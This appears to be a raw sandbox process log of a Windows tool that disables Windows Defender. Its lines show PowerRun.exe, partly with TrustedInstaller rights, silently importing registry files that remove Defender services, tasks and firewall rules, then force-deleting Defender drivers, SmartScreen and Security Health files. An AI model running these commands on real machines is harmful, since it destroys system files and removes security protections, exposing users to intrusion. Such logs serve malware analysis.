PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Services.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Defender Tasks.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Security and Maintenance.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Services.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Shell Association.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Security and Maintenance.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Services.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Shell Association.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Startup Entries.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Services.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Shell Association.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Startup Entries.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Windows Defender Firewall Rules.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Windows Defender Firewall Rules.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Startup Entries.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Shell Association.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Windows WebThreat.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Windows Defender Firewall Rules.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Startup Entries.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Windows WebThreat.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remover of Defender Context Menu.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Windows Defender Firewall Rules.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remover of Defender Context Menu.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Windows WebThreat.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Security Health.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remove Windows WebThreat.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remover of Defender Context Menu.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Security Health.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Windows Settings Page Visibility.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Remover of Defender Context Menu.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Windows Settings Page Visibility.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Security Health.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\SysWOW64\CompatTelRunner.exe"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Security Health.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Windows Settings Page Visibility.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\SysWOW64\CompatTelRunner.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\SysWOW64\DeviceCensus.exe"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Windows Settings Page Visibility.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\SysWOW64\CompatTelRunner.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\SysWOW64\DeviceCensus.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\SysWOW64\GameBarPresenceWriter.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\SysWOW64\DeviceCensus.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\SysWOW64\CompatTelRunner.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\SysWOW64\GameBarPresenceWriter.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\SysWOW64\smartscreen.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\SysWOW64\DeviceCensus.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\SysWOW64\GameBarPresenceWriter.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\SysWOW64\smartscreen.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\SysWOW64\smartscreen.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\SysWOW64\GameBarPresenceWriter.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\SysWOW64\smartscreen.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\SysWOW64\smartscreen.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\SysWOW64\smartscreenps.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\SysWOW64\smartscreen.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\SysWOW64\smartscreen.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\SysWOW64\smartscreenps.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\DWWIN.EXE"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\SysWOW64\smartscreen.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\SysWOW64\smartscreenps.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\DWWIN.EXE"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\GameBarPresenceWriter.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\SysWOW64\smartscreenps.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\DWWIN.EXE"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\GameBarPresenceWriter.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\SecurityAndMaintenance.png"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\DWWIN.EXE"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\GameBarPresenceWriter.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\SecurityAndMaintenance.png"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\SecurityAndMaintenance_Error.png"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\GameBarPresenceWriter.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\SecurityAndMaintenance.png"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\SecurityAndMaintenance_Error.png"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthAgent.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\SecurityAndMaintenance.png"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\SecurityAndMaintenance_Error.png"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthAgent.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthCore.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\SecurityAndMaintenance_Error.png"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthAgent.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthCore.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthHost.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthCore.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\SecurityHealthAgent.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthHost.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthProxyStub.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\SecurityHealthCore.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthProxyStub.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthHost.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthService.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthProxyStub.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\SecurityHealthHost.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthService.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthSsoUdk.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\SecurityHealthProxyStub.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthService.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthSsoUdk.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthSystray.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\SecurityHealthService.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthSsoUdk.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthSystray.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthUdk.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\SecurityHealthSsoUdk.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthSystray.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthUdk.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\drivers\SgrmAgent.sys"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\SecurityHealthSystray.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\SecurityHealthUdk.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\drivers\SgrmAgent.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\drivers\WdBoot.sys"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\SecurityHealthUdk.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\drivers\SgrmAgent.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\drivers\WdBoot.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\drivers\WdDevFlt.sys"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\drivers\SgrmAgent.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\drivers\WdBoot.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\drivers\WdDevFlt.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\drivers\WdFilter.sys"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\drivers\WdBoot.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\drivers\WdDevFlt.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\drivers\WdFilter.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\drivers\WdNisDrv.sys"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\drivers\WdDevFlt.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\drivers\WdNisDrv.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\drivers\WdFilter.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\smartscreen.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\smartscreen.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\drivers\WdFilter.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\drivers\WdNisDrv.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\smartscreen.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\smartscreen.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\drivers\WdNisDrv.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\smartscreen.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\smartscreenps.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\smartscreen.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\smartscreen.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\smartscreenps.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\wscadminui.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\smartscreen.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\smartscreenps.dll"
